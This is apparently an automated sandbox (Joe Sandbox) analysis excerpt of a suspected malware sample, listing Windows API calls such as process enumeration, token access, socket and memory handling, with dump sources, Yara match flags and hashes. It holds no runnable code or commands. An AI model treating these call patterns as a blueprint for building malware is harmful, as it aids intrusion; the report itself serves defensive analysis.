                                                                                                  • OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,02D210DB,000000FF,?,02D06AB3,00000000), ref: 02D06947
                                                                                                  • OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,02D210DB,000000FF,?,02D06AB3,00000000), ref: 02D06960
                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,02D210DB,000000FF,?,02D06AB3,00000000), ref: 02D0696B
                                                                                                  • SysStringLen.OLEAUT32(00000000), ref: 02D069BE
                                                                                                  • SysStringLen.OLEAUT32(00000000), ref: 02D069CC
                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,02D210DB,000000FF), ref: 02D06A2E
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,02D210DB,000000FF), ref: 02D06A34
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandleProcess$OpenString$CurrentToken
                                                                                                  • String ID:
                                                                                                  • API String ID: 429299433-0
                                                                                                  • Opcode ID: 8fe60832a2d80cd51a8b83e3364c2985fcf28b69aa9f51ec47969341328b503f
                                                                                                  • Instruction ID: 9478718ffb4b7b06393fdfbef1737765c64a145d17d21e9ad4aa98ffcfabfbc0
                                                                                                  • Opcode Fuzzy Hash: 8fe60832a2d80cd51a8b83e3364c2985fcf28b69aa9f51ec47969341328b503f
                                                                                                  • Instruction Fuzzy Hash: F541B1B2D401189BDB10DFA9D884BAEB7B8FB44304F21462AE915E7790D7759D14CBE0
                                                                                                  APIs
                                                                                                  • ___set_flsgetvalue.LIBCMT ref: 02D0FA4E
                                                                                                  • __calloc_crt.LIBCMT ref: 02D0FA5A
                                                                                                  • __getptd.LIBCMT ref: 02D0FA67
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,02D0F9C4,00000000,00000000,02D0E003), ref: 02D0FA9E
                                                                                                  • GetLastError.KERNEL32(?,00000000,?,?,02D0E003,00000000,00000000,02D05F40,00000000,00000000,00000000), ref: 02D0FAA8
                                                                                                  • _free.LIBCMT ref: 02D0FAB1
                                                                                                  • __dosmaperr.LIBCMT ref: 02D0FABC
                                                                                                    • Part of subcall function 02D0F91B: __getptd_noexit.LIBCMT ref: 02D0F91B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 155776804-0
                                                                                                  • Opcode ID: c7493d298567ee6e70e55e3e1f22d094864f49663c3c6c63d4ba9949c7bc7055
                                                                                                  • Instruction ID: bba59967a82d20c3eca0c744eeed664defca69162d219bf84a193f4bbf2d9a04
                                                                                                  • Opcode Fuzzy Hash: c7493d298567ee6e70e55e3e1f22d094864f49663c3c6c63d4ba9949c7bc7055
                                                                                                  • Instruction Fuzzy Hash: E011A032604716BFAB21AFA6AC84B9B379ADF44364B204425F90486BA0DF71DC018AB0
                                                                                                  APIs
                                                                                                  • ___set_flsgetvalue.LIBCMT ref: 00977240
                                                                                                  • __calloc_crt.LIBCMT ref: 0097724C
                                                                                                  • __getptd.LIBCMT ref: 00977259
                                                                                                  • CreateThread.KERNEL32(?,?,009771B6,00000000,?,?), ref: 00977290
                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 0097729A
                                                                                                  • _free.LIBCMT ref: 009772A3
                                                                                                  • __dosmaperr.LIBCMT ref: 009772AE
                                                                                                    • Part of subcall function 0097710D: __getptd_noexit.LIBCMT ref: 0097710D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 155776804-0
                                                                                                  • Opcode ID: 3a38458ae68315cfbac1849071454340f8b759ff2f864bf27e605b991850cbd3
                                                                                                  • Instruction ID: 302cace0bc135fa7290fb6d731845bb326425be96aa0a8d5aa1b3dc047a8551a
                                                                                                  • Opcode Fuzzy Hash: 3a38458ae68315cfbac1849071454340f8b759ff2f864bf27e605b991850cbd3
                                                                                                  • Instruction Fuzzy Hash: C31182331087066FDB11AFE59C46E9BB79CEF85764B118019F92C9A152EB71D81087B0
                                                                                                  APIs
                                                                                                  • ___set_flsgetvalue.LIBCMT ref: 02D0F9CA
                                                                                                    • Part of subcall function 02D13CA0: TlsGetValue.KERNEL32(00000000,02D13DF9,?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C,02D18E76,00000000,00000000), ref: 02D13CA9
                                                                                                    • Part of subcall function 02D13CA0: DecodePointer.KERNEL32(?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C,02D18E76,00000000,00000000,?,02D13F06,0000000D), ref: 02D13CBB
                                                                                                    • Part of subcall function 02D13CA0: TlsSetValue.KERNEL32(00000000,?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C,02D18E76,00000000,00000000,?,02D13F06), ref: 02D13CCA
                                                                                                  • ___fls_getvalue@4.LIBCMT ref: 02D0F9D5
                                                                                                    • Part of subcall function 02D13C80: TlsGetValue.KERNEL32(?,?,02D0F9DA,00000000), ref: 02D13C8E
                                                                                                  • ___fls_setvalue@8.LIBCMT ref: 02D0F9E8
                                                                                                    • Part of subcall function 02D13CD4: DecodePointer.KERNEL32(?,?,?,02D0F9ED,00000000,?,00000000), ref: 02D13CE5
                                                                                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 02D0F9F1
                                                                                                  • ExitThread.KERNEL32 ref: 02D0F9F8
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 02D0F9FE
                                                                                                  • __freefls@4.LIBCMT ref: 02D0FA1E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                  • String ID:
                                                                                                  • API String ID: 2383549826-0
                                                                                                  • Opcode ID: 4926136da2f0c11c224dbca85273d96d7bfdf21e50daad556e3f737e99d88b83
                                                                                                  • Instruction ID: 4734c861a8493caf24b3c9f8e52252cd4715abaa9d9d2bbc432a39e50e77d9e2
                                                                                                  • Opcode Fuzzy Hash: 4926136da2f0c11c224dbca85273d96d7bfdf21e50daad556e3f737e99d88b83
                                                                                                  • Instruction Fuzzy Hash: 4EF04F74940240BFC718AB61E54890E7BAAEF44340B218598E90587721DB34DC86CBA1
                                                                                                  APIs
                                                                                                  • ___set_flsgetvalue.LIBCMT ref: 009771BC
                                                                                                    • Part of subcall function 00979754: TlsGetValue.KERNEL32(00000000,009798AD,?,00979FB0,00000000,00000001,00000000,?,0097C0CF,00000018,00987C70,0000000C,0097C15F,00000000,00000000), ref: 0097975D
                                                                                                    • Part of subcall function 00979754: DecodePointer.KERNEL32(?,00979FB0,00000000,00000001,00000000,?,0097C0CF,00000018,00987C70,0000000C,0097C15F,00000000,00000000,?,009799BA,0000000D), ref: 0097976F
                                                                                                    • Part of subcall function 00979754: TlsSetValue.KERNEL32(00000000,?,00979FB0,00000000,00000001,00000000,?,0097C0CF,00000018,00987C70,0000000C,0097C15F,00000000,00000000,?,009799BA), ref: 0097977E
                                                                                                  • ___fls_getvalue@4.LIBCMT ref: 009771C7
                                                                                                    • Part of subcall function 00979734: TlsGetValue.KERNEL32(?,?,009771CC,00000000), ref: 00979742
                                                                                                  • ___fls_setvalue@8.LIBCMT ref: 009771DA
                                                                                                    • Part of subcall function 00979788: DecodePointer.KERNEL32(?,?,?,009771DF,00000000,?,00000000), ref: 00979799
                                                                                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 009771E3
                                                                                                  • ExitThread.KERNEL32 ref: 009771EA
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 009771F0
                                                                                                  • __freefls@4.LIBCMT ref: 00977210
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                  • String ID:
                                                                                                  • API String ID: 2383549826-0
                                                                                                  • Opcode ID: 87e28972696d28b587dbc55f6a4d89d16097953bd81396cf3ed3d5b24bf771cd
                                                                                                  • Instruction ID: e809942c8aa3c890c98798c093d54528b0b777000cce53d464ef2c7bf7917679
                                                                                                  • Opcode Fuzzy Hash: 87e28972696d28b587dbc55f6a4d89d16097953bd81396cf3ed3d5b24bf771cd
                                                                                                  • Instruction Fuzzy Hash: 1FF09676518640ABC708BFB1CD49A5E7BA9EFC4304721C858F90C8B213DA34D8469790
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 02D0607C
                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 02D06088
                                                                                                  • Process32FirstW.KERNEL32(00000000,00000000), ref: 02D060B9
                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 02D0610F
                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 02D06116
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 2526126748-0
                                                                                                  • Opcode ID: 65448a03b6cd785e0aea2eb64c5814ba77ad200356e82c860f552de613feb757
                                                                                                  • Instruction ID: 38dab732085ad6b8ee2743dbb50912357ff7bf6a250b92efe995c6f650704e71
                                                                                                  • Opcode Fuzzy Hash: 65448a03b6cd785e0aea2eb64c5814ba77ad200356e82c860f552de613feb757
                                                                                                  • Instruction Fuzzy Hash: D1219431A40124ABDB20EF74DC99FEE7369EF14314F204695EC09963D0EB359E24CAA1
                                                                                                  APIs
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 009732F1
                                                                                                  • Sleep.KERNEL32(00000258), ref: 009732FE
                                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 00973306
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00973312
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0097331A
                                                                                                  • Sleep.KERNEL32(0000012C), ref: 0097332B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
                                                                                                  • String ID:
                                                                                                  • API String ID: 3137405945-0
                                                                                                  • Opcode ID: 0a1108a17aa8252d8f38f529e353875b74689ee4ee8dd241bc6beac09bb0eb37
                                                                                                  • Instruction ID: b595ec0a43246f2db2814960636e16f72cee9da398d9f995c23d7c2d584cb932
                                                                                                  • Opcode Fuzzy Hash: 0a1108a17aa8252d8f38f529e353875b74689ee4ee8dd241bc6beac09bb0eb37
                                                                                                  • Instruction Fuzzy Hash: FBF082722087046BD610ABA9DC84E86F3A8AF85330B21470DF225973E0CAB0E8058BA0
                                                                                                  APIs
                                                                                                  • CoInitialize.OLE32(00000000), ref: 02D0669B
                                                                                                  • CoCreateInstance.OLE32(02D246FC,00000000,00000001,02D2471C,?,?,?,?,?,?,?,?,?,?,02D0588A), ref: 02D066B2
                                                                                                  • SysFreeString.OLEAUT32(?), ref: 02D0674C
                                                                                                  • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,02D0588A), ref: 02D0677D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateFreeInitializeInstanceStringUninitialize
                                                                                                  • String ID: FriendlyName
                                                                                                  • API String ID: 841178590-3623505368
                                                                                                  • Opcode ID: b2f26ffedb02a9d24f0b89c25b8ff2ebd52f2ea901456f331ced3f343e75acb4
                                                                                                  • Instruction ID: 016062413764a96c0e74b103b326c907621727bfa575d40dc26ba6f53b7e9257
                                                                                                  • Opcode Fuzzy Hash: b2f26ffedb02a9d24f0b89c25b8ff2ebd52f2ea901456f331ced3f343e75acb4
                                                                                                  • Instruction Fuzzy Hash: E7313B75A40205AFDB10DA98DC84FAAB7B9EFC8704F148598F905E7390DB71ED06CBA0
                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 02D0F721
                                                                                                    • Part of subcall function 02D0F673: __FF_MSGBANNER.LIBCMT ref: 02D0F68C
                                                                                                    • Part of subcall function 02D0F673: __NMSG_WRITE.LIBCMT ref: 02D0F693
                                                                                                    • Part of subcall function 02D0F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C,02D18E76), ref: 02D0F6B8
                                                                                                  • std::exception::exception.LIBCMT ref: 02D0F756
                                                                                                  • std::exception::exception.LIBCMT ref: 02D0F770
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 02D0F781
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                  • String ID: bad allocation
                                                                                                  • API String ID: 615853336-2104205924
                                                                                                  • Opcode ID: fed0cb684fcfc7d4d48fb4fe011467ff98a3236fb2758ce95c751346d957c285
                                                                                                  • Instruction ID: 55e65d6aa14ad4ac155c92ba5f378c1e8bc57035a8bdb0f892f23d4ff95a7f5a
                                                                                                  • Opcode Fuzzy Hash: fed0cb684fcfc7d4d48fb4fe011467ff98a3236fb2758ce95c751346d957c285
                                                                                                  • Instruction Fuzzy Hash: 41F0D6719002196EDB24EB55E865B6E37BAEB50708F644499E80496BE0DF70DD0CCEA1
                                                                                                  APIs
                                                                                                  • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 02D02D5C
                                                                                                  • CancelIo.KERNEL32(?), ref: 02D02D66
                                                                                                  • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02D02D6F
                                                                                                  • closesocket.WS2_32(?), ref: 02D02D79
                                                                                                  • SetEvent.KERNEL32(00000001), ref: 02D02D83
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                                                  • String ID:
                                                                                                  • API String ID: 1486965892-0
                                                                                                  • Opcode ID: 4b9c3f0fdc3bf6c867ef38b534f3ba9ce2676e3e8a5b46eea4a7a3e0766093a4
                                                                                                  • Instruction ID: 2bad0657d1cf6c14f9e46f86ed61e8de549fdfcb604755f5db71ffe61a682e3d
                                                                                                  • Opcode Fuzzy Hash: 4b9c3f0fdc3bf6c867ef38b534f3ba9ce2676e3e8a5b46eea4a7a3e0766093a4
                                                                                                  • Instruction Fuzzy Hash: 83F03C76540700ABD3349F54DD4DF6677B8BB59B11F104A1DFA9296780C6B0B9188BA0
                                                                                                  APIs
                                                                                                  • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 00972D3C
                                                                                                  • CancelIo.KERNEL32(?), ref: 00972D46
                                                                                                  • InterlockedExchange.KERNEL32(00000000,00000000), ref: 00972D4F
                                                                                                  • closesocket.WS2_32(?), ref: 00972D59
                                                                                                  • SetEvent.KERNEL32(00000001), ref: 00972D63
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                                                  • String ID:
                                                                                                  • API String ID: 1486965892-0
                                                                                                  • Opcode ID: 56dfc91c780f1f3883a747f7969516ca71f6f1b64d5cb18db363b90349504f01
                                                                                                  • Instruction ID: 01d92741f052963097213b073a346508ecb312605e0d9aa331371d63175ba3b6
                                                                                                  • Opcode Fuzzy Hash: 56dfc91c780f1f3883a747f7969516ca71f6f1b64d5cb18db363b90349504f01
                                                                                                  • Instruction Fuzzy Hash: 9FF04976114B00ABD3309F94DC49F6A77B8FB89B11F104A5CF68697790CBB0B9089BA0
                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 00976F31
                                                                                                    • Part of subcall function 00976E83: __FF_MSGBANNER.LIBCMT ref: 00976E9C
                                                                                                    • Part of subcall function 00976E83: __NMSG_WRITE.LIBCMT ref: 00976EA3
                                                                                                    • Part of subcall function 00976E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00979FB0,00000000,00000001,00000000,?,0097C0CF,00000018,00987C70,0000000C,0097C15F), ref: 00976EC8
                                                                                                  • std::exception::exception.LIBCMT ref: 00976F66
                                                                                                  • std::exception::exception.LIBCMT ref: 00976F80
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00976F91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 615853336-0
                                                                                                  APIs
                                                                                                  • RegCloseKey.ADVAPI32(80000001,02D06E9A), ref: 02D06EC9
                                                                                                  • RegCloseKey.ADVAPI32(s<u), ref: 02D06ED2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Close
                                                                                                  • String ID: s<u
                                                                                                  • API String ID: 3535843008-779365171
                                                                                                  APIs
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 02D0316B
                                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 02D03183
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 02D0322F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CurrentThread$ExchangeInterlocked
                                                                                                  • String ID:
                                                                                                  • API String ID: 4033114805-0
                                                                                                  APIs
                                                                                                  • __floor_pentium4.LIBCMT ref: 02D011E9
                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02D01226
                                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02D01255
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                  • String ID:
                                                                                                  • API String ID: 2605973128-0
                                                                                                  APIs
                                                                                                  • __floor_pentium4.LIBCMT ref: 009711E9
                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00971226
                                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00971255
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                  • String ID:
                                                                                                  • API String ID: 2605973128-0
                                                                                                  APIs
                                                                                                  • __floor_pentium4.LIBCMT ref: 02D0112F
                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02D0115F
                                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02D01192
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                  • String ID:
                                                                                                  • API String ID: 2605973128-0
                                                                                                  APIs
                                                                                                  • __floor_pentium4.LIBCMT ref: 0097112F
                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0097115F
                                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00971192
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                  • String ID:
                                                                                                  • API String ID: 2605973128-0
                                                                                                  APIs
                                                                                                  • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 02D09E04
                                                                                                  • GdipDisposeImage.GDIPLUS(?), ref: 02D09E18
                                                                                                  • GdipDisposeImage.GDIPLUS(?), ref: 02D09E3B
